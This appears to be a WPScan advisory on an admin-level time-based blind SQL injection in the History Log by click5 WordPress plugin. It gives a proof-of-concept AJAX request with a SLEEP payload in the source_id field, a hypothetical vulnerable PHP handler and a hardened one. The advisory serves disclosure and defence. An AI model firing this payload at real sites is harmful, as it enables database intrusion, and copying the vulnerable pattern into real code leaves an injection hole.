
wpvulndb | Karolis Narvilas | WPVDB-ID: 13A196BA-49C7-4575-9A49-3EF9EB2348F3
Published: Oct 16, 2023 - 12:00 a.m.

History Log by click5 < 1.0.13 - Admin+ Time-Based Blind SQL Injection

2023-10-16 00:00:00
Karolis Narvilas
wpscan.com
sql injection
admin users
ajax hook
vulnerable sql statement
wordpress plugin

AI Score: 8.2 High (Confidence: Low)

EPSS: 0.001 Low (Percentile: 19.3%)

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by admin users when using the Smash Balloon Social Photo Feed plugin alongside it.

PoC

[1] Navigate to Instagram Feed > Settings > Manage Sources, then click on "Delete Source". SQL Injection occurs via the "source_id" parameter in the below POST request:

==================
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 192.168.178.130
Content-Length: 526
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Accept: */*
Origin: http://192.168.178.130
Referer: http://192.168.178.130/wp-admin/admin.php?page=sbi-settings&view=general
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: -- SNIP --
Connection: close

------WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Content-Disposition: form-data; name="action"

sbi_feed_saver_manager_delete_source
------WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Content-Disposition: form-data; name="source_id"

2 AND (SELECT 1 FROM (SELECT(SLEEP(15)))PRISM)
------WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Content-Disposition: form-data; name="username"

pentester14598
------WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Content-Disposition: form-data; name="nonce"

036ad97501
------WebKitFormBoundaryIll2x5Ak4Efzv3Gv--
==================

The AJAX hook "wp_ajax_sbi_feed_saver_manager_delete_source" subsequently passes the value of "source_id" and triggers the vulnerable SQL statement within History Log's function "click5_sbi_instagram_delete_source".
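The defect class behind this entry is an AJAX parameter reaching a SQL statement without type coercion or parameter binding. The following is an added illustration written for this page; it is not the History Log plugin's code, and the hook name, function names and table name (example_delete_source, example_sources) are placeholders. It places a hypothetical vulnerable handler next to a hardened one. Note that the capability check on its own would not have closed the issue described here, since the reporter's attacker is already an administrator: what neutralises the "2 AND (SELECT ...)" payload is absint() reducing the value to the integer 2 and $wpdb->prepare() binding it as %d.

```php
<?php
// Added illustration for this advisory, not the plugin's own code.
// Hook, function and table names are placeholders.

// VULNERABLE PATTERN (hypothetical): the request parameter is concatenated
// straight into the query, so "2 AND (SELECT 1 FROM (SELECT(SLEEP(15)))x)"
// becomes part of the WHERE clause and the database sleeps.
function example_delete_source_vulnerable() {
    global $wpdb;
    $source_id = $_POST['source_id']; // attacker-controlled string
    $wpdb->query( "DELETE FROM {$wpdb->prefix}example_sources WHERE id = " . $source_id );
}

// HARDENED PATTERN: capability check, nonce check, integer coercion and a
// prepared statement. Only the last two stop an admin-level injection.
function example_delete_source_hardened() {
    global $wpdb;

    // 1. Restrict the handler to users allowed to manage the plugin.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 2. Nonce bound to this action (placeholder action name), read from the
    //    "nonce" form field; check_ajax_referer() dies on mismatch.
    check_ajax_referer( 'example_delete_source', 'nonce' );

    // 3. Coerce to a non-negative integer. absint() turns the injection
    //    payload "2 AND (SELECT ...)" into plain 2; non-numeric input becomes 0.
    $source_id = isset( $_POST['source_id'] ) ? absint( $_POST['source_id'] ) : 0;
    if ( 0 === $source_id ) {
        wp_send_json_error( 'invalid source_id', 400 );
    }

    // 4. Parameterised query: %d is bound as an integer by $wpdb->prepare(),
    //    so no user-supplied text is ever spliced into the SQL string.
    $table   = $wpdb->prefix . 'example_sources';
    $deleted = $wpdb->query(
        $wpdb->prepare( "DELETE FROM {$table} WHERE id = %d", $source_id )
    );

    wp_send_json_success( array( 'deleted' => (int) $deleted ) );
}
add_action( 'wp_ajax_example_delete_source', 'example_delete_source_hardened' );
```

When reviewing a plugin's AJAX handlers for this pattern, the quickest check is to grep for $wpdb->query() or $wpdb->get_results() calls whose argument is built by concatenation or string interpolation rather than wrapped in $wpdb->prepare(); any such call that can be reached from a wp_ajax_* hook deserves the treatment above.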

CPE | Name | Operator | Version
    |      | eq       | 1.0.13

